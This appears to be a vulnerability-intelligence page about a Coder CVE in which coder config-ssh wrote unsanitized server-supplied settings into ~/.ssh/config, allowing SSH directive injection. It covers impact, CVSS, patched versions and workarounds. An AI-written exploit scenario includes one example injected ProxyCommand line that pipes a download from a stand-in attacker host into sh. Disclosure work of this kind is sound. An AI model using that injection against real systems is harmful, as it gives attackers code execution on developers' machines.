Coder CVE-2026-55427
HIGHSeverity by source
AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
AC:H and UI:R capture the required privileged/MITM server position and the victim running config-ssh; S:C because injected directives affect all workstation SSH connections, yielding full C/I/A code execution.
Primary rating from Vendor (https://github.com/coder/coder).
CVSS VectorVendor: https://github.com/coder/coder
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
Lifecycle Timeline
1DescriptionCVE.org
Summary
coder config-ssh wrote server-supplied SSH settings (HostnameSuffix, SSHConfigOptions) into the user's ~/.ssh/config without sanitizing embedded newlines or restricting directives so a malicious or compromised Coder server could inject arbitrary SSH configuration.
> Note: Practical exploitation requires control of the server-supplied values through a malicious or compromised deployment, a man-in-the-middle position or admin access to the HostnameSuffix and SSHConfigOptions settings.
Impact
A server administrator or an attacker who controlled the server, could inject a directive such as ProxyCommand and achieve arbitrary code execution on any developer workstation that ran coder config-ssh. Injected commands ran with the local user's privileges and applied to all SSH connections, not just Coder workspaces.
Patches
The fix validates HostnameSuffix and SSHConfigOptions against a strict character set that rejects newlines and other control characters.
The fix was backported to all supported release lines:
Workarounds
Inspect coder config-ssh --dry-run output before applying changes.
Resources
- Fix: #26154
Credits
Coder would like to thank Anthropic's Security Team (ANT-2026-22437) for independently disclosing this issue!
AnalysisAI
SSH configuration injection leading to arbitrary code execution in Coder's coder config-ssh CLI command allows a malicious or compromised Coder server to write attacker-controlled directives into a developer's ~/.ssh/config. The command copied server-supplied HostnameSuffix and SSHConfigOptions values verbatim without stripping newlines, letting an attacker in control of those values inject a directive such as ProxyCommand that runs on every SSH connection from the workstation. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to control the server-supplied `HostnameSuffix` or `SSHConfigOptions` values, achieved through one of three concrete positions named in the advisory: (1) a malicious or attacker-operated Coder deployment, (2) a man-in-the-middle position on the client-to-server connection, or (3) administrative access to those two settings on a legitimate deployment. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score is 8.3 (High) with vector AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H - network vector, high attack complexity, no privileges required on the victim, but requiring user interaction (the developer must run `coder config-ssh`) and a scope change reflecting that injected config affects all SSH connections, not just Coder workspaces. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has compromised a Coder server, stood up a malicious deployment, or holds admin rights over the SSH-related deployment settings configures `SSHConfigOptions` (or `HostnameSuffix`) to contain an embedded newline followed by `ProxyCommand=/bin/sh -c 'curl attacker/x | sh'`. When a developer runs `coder config-ssh`, the payload is written into `~/.ssh/config` and executes with the developer's privileges on their next SSH connection - including connections unrelated to Coder. … |
| Remediation | Vendor-released patch: upgrade to the fixed version for your release line - 2.34.2, 2.33.8, 2.32.7, or 2.29.17 (ESR) - per the release tags at https://github.com/coder/coder/releases and advisory GHSA-mcqq-fqgf-rxwm; these add strict character-set validation that rejects newlines/control characters in `HostnameSuffix` and `SSHConfigOptions`. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Audit all Coder server deployments to identify instances and verify current versions across supported release lines. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-mcqq-fqgf-rxwm